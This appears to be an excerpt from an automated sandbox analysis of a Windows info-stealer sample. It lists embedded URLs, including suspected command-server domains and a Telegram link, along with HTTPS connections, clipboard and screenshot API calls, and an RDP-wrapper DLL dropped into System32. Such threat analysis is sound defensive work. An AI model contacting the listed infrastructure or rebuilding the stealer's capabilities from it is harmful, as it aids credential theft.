Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: DHCAEC.6.dr	String found in binary or memory: https://support.mozilla.org
Source: DHCAEC.6.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DHCAEC.6.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: file.exe, 00000002.00000002.1334300734.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, BKKFCFBKFC.exe, 00000011.00000002.1990889383.000000000431B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: RegAsm.exe, 00000010.00000002.2095280392.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vozmeatillu.shop/api
Source: RegAsm.exe, 00000010.00000002.2095280392.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wallkedsleeoi.shop/api
Source: RegAsm.exe, 00000006.00000002.2061826674.000000000125F000.00000004.00000020.00020000.00000000.sdmp, AEHIDA.6.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: EHJDGC.6.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: EHJDGC.6.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: RegAsm.exe, 00000006.00000002.2061826674.000000000125F000.00000004.00000020.00020000.00000000.sdmp, AEHIDA.6.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: DHCAEC.6.dr	String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000006.00000002.2069983798.0000000019CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: DHCAEC.6.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: RegAsm.exe, 00000006.00000002.2069983798.0000000019CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: DHCAEC.6.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: RegAsm.exe, 00000006.00000002.2069983798.0000000019CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: DHCAEC.6.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: DHCAEC.6.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000006.00000002.2069983798.0000000019CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: DHCAEC.6.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.194.216:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.32:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.7:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.130:443 -> 192.168.2.7:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.7:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.7:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49765 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

16_2_00439BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

16_2_00439BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

6_2_00411F55

System Summary

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216
Source: GIEHJDHCBA.exe.6.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 365056
Source: 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 365056
Source: BKKFCFBKFC.exe.6.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216
Source: 66f5db9e54794_vfkagks[1].exe.6.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_0040145B GetCurrentProcess,NtQueryInformationProcess,

6_2_0040145B

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Windows\System32\rfxvmt.dll

Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01510C40	2_2_01510C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0042D933	6_2_0042D933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0042D1C3	6_2_0042D1C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041C472	6_2_0041C472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0042D561	6_2_0042D561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041950A	6_2_0041950A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0042DD1B	6_2_0042DD1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0042CD2E	6_2_0042CD2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041B712	6_2_0041B712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9BECC0	6_2_6C9BECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA1ECD0	6_2_6CA1ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA9AC30	6_2_6CA9AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA86C00	6_2_6CA86C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9CAC60	6_2_6C9CAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9C4DB0	6_2_6C9C4DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA56D90	6_2_6CA56D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB4CDC0	6_2_6CB4CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB48D20	6_2_6CB48D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA8ED70	6_2_6CA8ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CAEAD50	6_2_6CAEAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA46E90	6_2_6CA46E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9CAEC0	6_2_6C9CAEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA60EC0	6_2_6CA60EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CAA0E20	6_2_6CAA0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA5EE70	6_2_6CA5EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB08FB0	6_2_6CB08FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9CEFB0	6_2_6C9CEFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA9EFF0	6_2_6CA9EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9C0FE0	6_2_6C9C0FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9C6F10	6_2_6C9C6F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB00F20	6_2_6CB00F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA82F70	6_2_6CA82F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA2EF40	6_2_6CA2EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CAC68E0	6_2_6CAC68E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA10820	6_2_6CA10820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA4A820	6_2_6CA4A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA94840	6_2_6CA94840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA509A0	6_2_6CA509A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA7A9A0	6_2_6CA7A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA809B0	6_2_6CA809B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CADC9E0	6_2_6CADC9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9F49F0	6_2_6C9F49F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA16900	6_2_6CA16900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9F8960	6_2_6C9F8960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA3EA80	6_2_6CA3EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA78A30	6_2_6CA78A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA6EA00	6_2_6CA6EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA3CA70	6_2_6CA3CA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA60BA0	6_2_6CA60BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CAC6BE0	6_2_6CAC6BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CAEA480	6_2_6CAEA480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA064D0	6_2_6CA064D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA5A4D0	6_2_6CA5A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA24420	6_2_6CA24420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA4A430	6_2_6CA4A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9D8460	6_2_6C9D8460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9B45B0	6_2_6C9B45B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA8A5E0	6_2_6CA8A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA4E5F0	6_2_6CA4E5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA22560	6_2_6CA22560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA60570	6_2_6CA60570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB08550	6_2_6CB08550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA18540	6_2_6CA18540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CAC4540	6_2_6CAC4540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA1E6E0	6_2_6CA1E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA5E6E0	6_2_6CA5E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9E46D0	6_2_6C9E46D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA1C650	6_2_6CA1C650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9EA7D0	6_2_6C9EA7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA40700	6_2_6CA40700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9B8090	6_2_6C9B8090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA9C0B0	6_2_6CA9C0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9D00B0	6_2_6C9D00B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA8C000	6_2_6CA8C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA88010	6_2_6CA88010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA0E070	6_2_6CA0E070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9C01E0	6_2_6C9C01E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA36130	6_2_6CA36130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CAA4130	6_2_6CAA4130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA28140	6_2_6CA28140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA922A0	6_2_6CA922A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA8E2B0	6_2_6CA8E2B0
